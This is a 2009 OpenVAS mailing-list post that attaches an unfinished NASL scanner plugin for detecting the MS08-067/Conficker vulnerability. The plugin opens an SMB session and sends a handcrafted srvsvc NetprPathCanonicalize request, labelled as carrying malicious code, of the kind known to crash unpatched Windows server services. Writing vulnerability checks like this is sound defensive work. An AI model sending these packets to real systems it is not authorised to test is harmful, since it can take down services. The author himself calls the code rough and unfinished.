On Tuesday 31 March 2009 13:06:42 Chandrashekhar B wrote: *snip*
> to detect patch condition of MS08-067. The plugin 900055 requires SMB > credentials and verifies if the required hotfix is installed through > Windows Registry and verifying the updated file versions. The plugin 900056 > is a Proof of Concept exploit that tries to crash the server service > (safe_checks has to be disabled). This can work on anonymous login > credentials if the target system allows anonymous login (Windows 2000 by > default allows anonymous login). The plugin checks the RPC response status > of an un-patched system. This is all true but it doesn't really go far enough since it only looks for the original vulnerability and not Conficker. I started working on a check for Conficker last night and got someway before I noticed a glaring problem but nothing which at this stage is complete. I've attached the plugin in rough form here if anyone wants to take it up. The problems I've had so far is the lack of support for non-clear text authentication in the OpenVAS SMB implementation which is limiting my ability to test here, as I only have 2003/Vista systems to play with. I've diverted to start working on that and will be sending another email shortly to openvas-devel regarding this. Cheers, Tim -- Tim Brown <mailto:[email protected]> <http://www.nth-dimension.org.uk/>
############################################################################# # Based on the work of Tim Brown <[email protected]> as published # here, http://www.nth-dimension.org.uk/blog.php?id=72 along with the # associated NASL from SecPod ############################################################################ if(description) { script_id(900056); script_dependencies("secpod_reg_enum.nasl"); exit(0); } include("smb_nt.inc"); if(safe_checks()){ exit(0); } name = kb_smb_name(); login = kb_smb_login(); pass = kb_smb_password(); domain = kb_smb_domain(); port = kb_smb_transport(); soc = open_sock_tcp(port); if(!soc){ exit(0); } if(!domain) domain = ""; if(!login) login = ""; if(!pass) pass = ""; r = smb_session_request(soc:soc, remote:name); if(!r) { close(soc); exit(0); } prot = smb_neg_prot(soc:soc); if(!prot){ close(soc); exit(0); } r = smb_session_setup(soc:soc, login:login, password:pass, domain:domain, prot:prot); if(!r) { close(soc); report = string("MS08-067: Failed to perform Clear Text based authentication."); security_note(data:report, port:port); exit(0); } uid = session_extract_uid(reply:r); if(!uid) { close(soc); exit(0); } r = smb_tconx(soc:soc, uid:uid, share:"IPC$", name:name); if(!r) { close(soc); exit(0); } tid = tconx_extract_tid(reply:r); if(!tid) { close(soc); exit(0); } tid_high = tid / 256; tid_low = tid % 256; uid_high = uid / 256; uid_low = uid % 256; # \srvsvc Request req = raw_string(0xff, 0x53, 0x4d, 0x42, 0xa2, 0x00, 0x00, 0x00, 0x00, 0x08, 0x01, 0xc8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, tid_low, tid_high, 0xa2, 0x4d, uid_low, uid_high, 0x0b, 0x00, 0x18, 0xff, 0x00, 0x00, 0x00, 0x00, 0x0e, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x9f, 0x01, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x11, 0x00, 0x00, 0x5c, 0x00, 0x73, 0x00, 0x72, 0x00, 0x76, 0x00, 0x73, 0x00, 0x76, 0x00, 0x63, 0x00, 0x00, 0x00); req = raw_string(0x00, 0x00, 0x00, (strlen(req)%256)) + req; send(socket:soc, data:req); resp = smb_recv(socket:soc, length:4096); if(strlen(resp) < 107) { close(soc); exit(0); } fid_low = ord(resp[42]); fid_high = ord(resp[43]); # srvsvc Bind Request req = raw_string(0xff, 0x53, 0x4d, 0x42, 0x25, 0x00, 0x00, 0x00, 0x00, 0x08, 0x01, 0xc8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, tid_low, tid_high, 0xa2, 0x4d, uid_low, uid_high, 0x0c, 0x00, 0x10, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0xb8, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x52, 0x00, 0x48, 0x00, 0x52, 0x00, 0x02, 0x00, 0x26, 0x00, fid_low, fid_high, 0x57, 0x00, 0x00, 0x5c, 0x00, 0x50, 0x00, 0x49, 0x00, 0x50, 0x00, 0x45, 0x00, 0x5c, 0x00, 0x00, 0x00, 0x05, 0x00, 0x0b, 0x03, 0x10, 0x00, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0xb8, 0x10, 0xb8, 0x10, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0xc8, 0x4f, 0x32, 0x4b, 0x70, 0x16, 0xd3, 0x01, 0x12, 0x78, 0x5a, 0x47, 0xbf, 0x6e, 0xe1, 0x88, 0x03, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00); req = raw_string(0x00, 0x00, 0x00, (strlen(req)%256)) + req; send(socket:soc, data:req); smb_recv(socket:soc, length:4096); # ntrPathCanonicalize Request (With Malicious Code) req = raw_string( 0xff, 0x53, 0x4d, 0x42, 0x25, 0x00, 0x00, 0x00, 0x00, 0x08, 0x01, 0xc8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, tid_low, tid_high, 0x00, 0x28, uid_low, uid_high, 0x0d, 0x00, 0x10, 0x00, 0x00, 0x7c, 0x00, 0x00, 0x00, 0xb8, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x52, 0x00, 0x7c, 0x00, 0x52, 0x00, 0x02, 0x00, 0x26, 0x00, fid_low, fid_high, 0x83, 0x04, 0x00, 0x5c, 0x00, 0x50, 0x00, 0x49, 0x00, 0x50, 0x00, 0x45, 0x00, 0x5c, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x03, 0x10, 0x00, 0x00, 0x00, 0x7c, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00, 0x64, 0x00, 0x00, 0x00, 0x00, 0x00, 0x1f, 0x00, 0x00, 0x00, 0x02, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x31, 0x00, 0x39, 0x00, 0x32, 0x00, 0x2E, 0x00, 0x31, 0x00, 0x36, 0x00, 0x38, 0x00, 0x2e, 0x00, 0x31, 0x00, 0x35, 0x00, 0x33, 0x00, 0x2e, 0x00, 0x31, 0x00, 0x32, 0x00, 0x39, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x5c, 0x00, 0x2e, 0x00, 0x2e, 0x00, 0x5c, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x27, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00); req = raw_string(0x00, 0x00, 0x00, 0xce) + req; send(socket:soc, data:req); resp = smb_recv(socket:soc, length:1024); fwrite(file:"/tmp/bah", data:resp); close(soc); exit(0);
_______________________________________________ Openvas-discuss mailing list [email protected] http://lists.wald.intevation.org/mailman/listinfo/openvas-discuss
